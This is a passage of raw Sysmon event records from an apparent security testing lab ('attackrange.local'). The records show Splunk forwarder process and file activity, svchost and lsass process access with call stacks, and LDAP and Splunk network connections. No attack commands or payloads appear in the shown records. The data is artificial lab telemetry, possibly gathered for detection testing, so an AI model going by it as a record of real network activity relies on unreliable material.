Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001061123Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:25.247{7F8C56E7-4E4C-6063-3300-00000000AF01}23643588C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7F8C56E7-51E5-6063-2501-00000000AF01}5000C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001061122Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:25.249{7F8C56E7-51E5-6063-2501-00000000AF01}5000C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7F8C56E7-4E3B-6063-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000245890Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:24.546{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64780-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000245889Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:25.818{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C8A00C3636DD711D8F2075D2582403DC,SHA256=4776DAEF5C91BC4ABF90DAF40CBE5A4EFF42A7C114013B5F191ED69DB7CAD724,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061140Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:26.622{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=55E26CFC068528AE29F2BCC70FC00BF6,SHA256=69454B00E4661D37C4F5F659F59C1E6E9BE3624ED5407C7B14775FBC371EDA12,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245892Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:26.833{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BDE97133ACAAD6D927B9257CEBBF1972,SHA256=421ED5CEAAD7E907EE5CDFE9131DCB09A1FA6A894DF3348DE861E3E6A777B40C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245891Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:26.005{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=702BD850772C95E7DB1111A9D0F762E8,SHA256=D0C925CAAF4C374E1DA7463B7A9FA815738441D9FD8C1E32490566BCD77817A8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061142Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:27.982{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3FC42AFEDF5314C8FB4BF6099A01AD44,SHA256=8315933A5A32CA5F2748C83175ADDA9E27AB8A07CD34C1A663A81E8AEDA5E189,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001061141Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:25.090{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54805-false10.0.1.12-8000- 23542300x8000000000000000245893Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:27.833{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22A7E318CA62318DD1314730750804D2,SHA256=DBC80E3F719EC5AE16A2F3C4022C5711E0BAF78C0C437A8A70F75F33686E58B1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245894Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:28.880{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4DB4C12BF3C48742BD9E7E154F99831D,SHA256=A9BDCB89BFF47D4BD3C2B616A4D877A3A8D27395B7DD5DF311850821EEFAA80E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061143Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:29.373{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F40E7DAF1DF7A6216A0555A99761A591,SHA256=F5E1A33BEC0BA069EF7DFA66073D9D40AF3FBF497EF307A6CD2AB68B6A97E10B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245895Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:29.989{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E36CD32901FADD9A392843240B56BED,SHA256=2497E4E8A3393FE1404E58B8D58CC5E91939D29525B10249C7F27B2CBEC74355,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001061146Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:30.779{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E3C-6063-1600-00000000AF01}1280C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000001061145Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:30.732{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=31D9D5EDCE8CBA639EF07EC0DA3C46B8,SHA256=8F509336335E3A24099355EAA6CBA90D9DC83F41143998900E69E139C65F0A1B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001061144Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:30.576{7F8C56E7-4E3B-6063-0B00-00000000AF01}6283996C:\Windows\system32\lsass.exe{7F8C56E7-4E39-6063-0100-00000000AF01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+30949|C:\Windows\system32\lsasrv.dll+2e2a7|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 354300x8000000000000000245897Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:29.546{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64781-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000245896Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:30.114{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=301C5F13BFBB26DD20D34A7484925556,SHA256=3DE95AB9A07993AE37C18AB0725E2321626B5225C6CC37871A1CBD85484B26B4,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001061179Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:29.302{7F8C56E7-4E3B-6063-0B00-00000000AF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-877.attackrange.local54807-false10.0.1.14win-dc-877.attackrange.local389ldap 354300x80000000000000001061178Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:29.302{7F8C56E7-4E3C-6063-1600-00000000AF01}1280C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54807-false10.0.1.14win-dc-877.attackrange.local389ldap 354300x80000000000000001061177Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:29.296{7F8C56E7-4E3B-6063-0B00-00000000AF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:1d65:2de2:d417:1a1fwin-dc-877.attackrange.local54806-truefe80:0:0:0:1d65:2de2:d417:1a1fwin-dc-877.attackrange.local389ldap 354300x80000000000000001061176Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:29.296{7F8C56E7-4E3C-6063-1600-00000000AF01}1280C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:1d65:2de2:d417:1a1fwin-dc-877.attackrange.local54806-truefe80:0:0:0:1d65:2de2:d417:1a1fwin-dc-877.attackrange.local389ldap 10341000x80000000000000001061175Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:31.388{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E68-6063-8F00-00000000AF01}3764C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061174Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:31.388{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E68-6063-8F00-00000000AF01}3764C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061173Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:31.388{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E68-6063-8F00-00000000AF01}3764C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061172Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:31.388{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E68-6063-8F00-00000000AF01}3764C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061171Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:31.388{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E68-6063-8F00-00000000AF01}3764C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061170Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:31.388{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E68-6063-8F00-00000000AF01}3764C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061169Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:31.388{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E68-6063-8F00-00000000AF01}3764C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061168Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:31.388{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E66-6063-8C00-00000000AF01}4964C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061167Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:31.388{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E66-6063-8C00-00000000AF01}4964C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061166Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:31.388{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E66-6063-8C00-00000000AF01}4964C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061165Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:31.388{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E66-6063-8C00-00000000AF01}4964C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061164Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:31.388{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E66-6063-8C00-00000000AF01}4964C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061163Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:31.388{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E66-6063-8C00-00000000AF01}4964C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061162Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:31.388{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E66-6063-8C00-00000000AF01}4964C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061161Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:31.388{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E66-6063-8C00-00000000AF01}4964C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061160Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:31.388{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E66-6063-8C00-00000000AF01}4964C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061159Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 